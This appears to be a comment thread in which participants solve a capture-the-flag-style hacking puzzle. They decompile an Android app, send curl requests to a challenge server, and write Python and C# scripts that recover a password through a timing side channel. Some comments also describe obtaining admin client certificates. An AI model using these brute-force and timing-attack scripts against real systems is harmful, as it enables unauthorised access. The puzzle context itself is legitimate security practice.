Poke around and you'll find code for POSTing JSON-encoded credentials to http://35.246.158.51:8070/auth/getUrl. (Grep for the IP to find it.)
So, using the web site name as the seed and the 'client id' as the password, we get:
$ curl -X POST -H "Content-Type: application/json" -d '{"Seed": "3d375032374147a7865753e4bbc92682", "Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' http://35.246.158.51:8070/auth/getUrl
The response is an HTTP 200 and: {"AuthURL":"/auth/v2"}
http://35.246.158.51:8070/auth/v2 is I guess the next step.
edit: The /auth/getUrl endpoint responds to any request with the same response, so that may not be the right Seed/Password combination.
I haven't yet figured out what those are though...
See:
Future<Token> login(String seed, String password) {
var headers = new Map<String,String>();
return _netUtil.get(LOGIN_URL, headers:headers).then((dynamic authUrl) {
try {
if (authUrl == null) {
return Future<Token>.sync(() => new Token("", false, 0));
}
var loginUrl = BASE_URL + AuthURL.map(json.decode(authUrl.body)).url;This leads me to believe that the seed and password entered in development / in the cookie jar from a previous attempt are somewhere in the `isolate_snapshot_data` file
[0] https://github.com/flutter/flutter/wiki/Flutter-engine-opera...
first of all, as per the code, the User-Agent must be setup to "iWalk-v2"
then doing a simple get request to http://35.246.158.51:8070 will return {"AuthURL":"/auth/v2"}
replacing the original url with http://35.246.158.51:8070/auth/v2 and then sending a json like '{"Seed": "3d375032374147a7865753e4bbc92682", "Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' with "Content-Type: application/json" returns {"IsValid":false,"LockURL":"","Time":136764}
the Time here (as per my understanding in the code) is the request duration, which somehow contradicts postman's request duration field
now one weird thing I've noticed about this app is this, if i install it on a regular device, and connect that to a proxy, then type gibberish into the fields then click Login, the following code gets invoked
void _submit() async {
final form = formKey.currentState;
if (form.validate()) {
setState(() => _isLoading = true);
form.save();
_networkActions.login(_seed, _password)
.then((result) => _loginCompleted(result))
.catchError((e) {
_loginCompleted(new Token("", false, 0));
});
}
"Welcome Agent.
A team of field operatives is currently on-site in enemy territory, working to retrieve intel on an imminent terrorist attack.
The intel is contained in a safe, the plans for which are available to authorized clients via an app [0].
Our client ID is d09ff4ec651c48f89f7f7aa19160bd55
Your mission is to retrieve those plans, and allow our team to break into the safe.
Good luck!,
M."
You could always install it on a virtual phone in a sandboxed VM.
Challenge-1 :Link http://3d375032374147a7865753e4bbc92682.xyz / http://35.246.158.51
Download app.apk from http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk Remember your Client ID - mine is 854279b4c89e4b5c9722352c3f9f1d6c You will user it as "Seeder" property in the app //////////////////////////////////////////////////////////////////////////////////////////////// using WireShark (or any other packet snipper) we can see that the login button does this:
POST /auth/v2 HTTP/1.1si user-agent: iWalk-v2 content-type: application/json; charset=utf-8 accept-encoding: gzip content-length: 29 host: 35.246.158.51:8070 {"Seed":"admin","Password":"admin "}HTTP/1.1 200 OK Content-Type: application/json Date: Wed, 08 May 2019 21:49:05 GMT Content-Length: 47
{"IsValid":false,"LockURL":"","Time":149646302} ///////////////////////////////////////////////////////
Using http://www.javadecompilers.com/, i Decompiled the apk, and got a lock at the Manifest < <xml version="1.0" encoding="utf-8" ....... <activity android:configChanges="density|fontScale|keyboard|keyboardHidden|layoutDirection|locale|orientation|screenLayout|screenSize" android:hardwareAccelerated="true" android:launchMode="singleTop" android:name="com.iwalk.locksmither.MainActivity" .... .....
The line "look for us on github.com" got my attention, so i looked for iwalk.locksmither in github and found "iwalk-locksmithers" linke: https://github.com/iwalk-locksmithers-app the server source code was there. In the code, there are a few comments that can help
https://github.com/iwalk-locksmithers-app/server/blob/master... link 70 points us to the auth-1 weeknes.
the part of "for currentIndex < len(lock.Password) && currentIndex < len(loginData.Password) { if lock.Password[currentIndex] != loginData.Password[currentIndex] { break } //OG: securing against bruteforce attempts... ;-) time.Sleep(30 * time.Millisecond) currentIndex++ }"
the securing aginst bruteforce (tyring all combinations) is the weeknes. The idea behind for hacking the password is to try only one char at first. if we get a 30ms dealy, it means we got the 1st char right, so then we can check the next one, so we will try 2 chars (the 1st we know, the second we will guess) if we will get 60 ms +- dealy then we got th 2nd char and we will try the third one, and again and again, until we will get the password.
To solve it, it wrote a simple c# code that does in a loop http push to the server every time we try to add a new char to the password, and if we got a dealy that is +- 30ms more then the last try, we add that char our final password the uri is http://35.246.158.51:8070/auth/v1_1 and user agent is ed9ae2c0-9b15-4556-a393-23d500675d4b (as writen in the server) I did some avg calcs of the dealys The password length is 32 with hexa char (didnt know that until i guessed the password) we can know that the password is correct when we get back "IsValid":true" *Time we get is in nano Seconds and not ms
After I enterd the pasword and cliend id, i got a link for a token and a linke for challenge 2
http://759d8eba52184f538c8a4525680cfb33.xyz/
Challenge-2 http://759d8eba52184f538c8a4525680cfb33.xyz/
import requests
import string
#a-zA-Z!@#$%^&*()_-=
printables_chars = string.printable
agent = 'ed9ae2c0-9b15-4556-a393-23d500675d4b'
for i, char in enumerate(printables_chars):
print('run {}. char {}'.format(i,char))
result = requests.post('http://35.246.158.51:8070/auth/v1_1',
data={"Seed": "d14236b60e0f4aef94499cb648a5f522", "Password": char})
if(result.json()['Time'] > 100000000):
# This prints randomly for some cases and others doesn't
print(result.json()['Time'])CHARACTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=[]{}|\/?,.<>`~"
URL = "http://35.246.158.51:8070/auth/v1_1"
HEADERS = {'User-Agent' : 'ed9ae2c0-9b15-4556-a393-23d500675d4b', 'content-type' : 'application/json; charset=utf-8' }
PAYLOAD ={}
for i in range(len(CHARACTERS)):
PAYLOAD['Seed'] = "6711d2ec0d724396ad1570fcfb431443"
PAYLOAD['Password'] = "" + CHARACTERS[i]
r = requests.post(url=URL, json=PAYLOAD, headers=HEADERS)
result = r.json()
delay = result['Time']
print(str(PAYLOAD) + " - " + str(delay))
But I got some progress: 1. Image leads to subdomain: http://dev.missilesys.com/ 2. It generates p12 certificate for login to admin-panel. You should enter username/password, submit the form and click download. (It there is no download button just try something like this: refresh the page, change method from POST to GET, enter credentials and press Submit, after that press submit again it'll appear) 3. Add certificate to KeyChain (on macOS) and go to missilesys.com. 4. You're got into admin-panel, but you have no permissions to shutdown it. You need to be an administrator. 5. You should get .p12 certificate for administrator, but you can't because "User alreay exists!". This's place where I'm stuck.
It would be great if you have an idea how to handle with it :)
1. Access $("#text1")[0].innerHTML
2. $( document ).ready() { typeWriter (); }
facepalm
Why not upload a plain text file in the first place?
Remember, this thing'll be getting picked apart by everybody considering the source.
Unless you're afraid of getting black bagged that i...<SIGNAL LOST>
You need to figure out the address of the site I posted from the picture. (Not that difficult)
Does curiosity really make ya'll this dumb?
As an ip address, 35.246.158.51 leads to the site OP posted.
The challenges usually involve static analysis / disassembly, breaking improperly configured crypto, etc. The best part (for me at least) is that competitors must submit a write-up of how they cracked the challenge, and the best write-ups are published. It makes for fascinating reading even if you’re not really into that scene.
https://books.google.rs/books?id=1nfhpqvLSM4C&pg=PA397&lpg=P...
on page 397 there is entry in index: iWalk, v2 71 on the same page there are interesting terms like islamic terrorism, jihad via internet, judism... also page number 71 which stands next to iWalk term is interesting coincidence since this riddle is celebrating 71 years of Israel independence...